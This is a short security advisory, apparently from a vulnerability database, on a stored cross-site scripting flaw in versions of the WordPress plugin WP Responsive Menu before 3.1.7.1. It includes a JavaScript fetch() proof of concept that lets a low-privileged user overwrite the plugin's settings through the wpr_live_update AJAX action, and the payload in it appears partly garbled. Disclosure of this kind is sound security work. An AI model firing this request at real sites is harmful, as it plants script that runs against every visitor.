WP Responsive Menu < 3.1.7.1 - Subscriber+ Settings Update to Stored XSS

The plugin does not have capability and CSRF checks in the wpr_live_update AJAX action, as well as do not sanitise and escape some of the data submitted. As a result, any authenticated, such as subscriber could update the plugin’s settings and perform Cross-Site Scripting attacks against all visitor and users on the frontend

PoC

fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=wpr_live_update&wprmenu;_options[enabled]=1&wprmenu;_options[position]=">”, “method”: “POST”, }) .then(response => response.text()) .then(function(data) { console.log(data); fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=wpr_get_transient_from_data”, “method”: “POST”, }); }); The XSS will be triggered in all frontend pages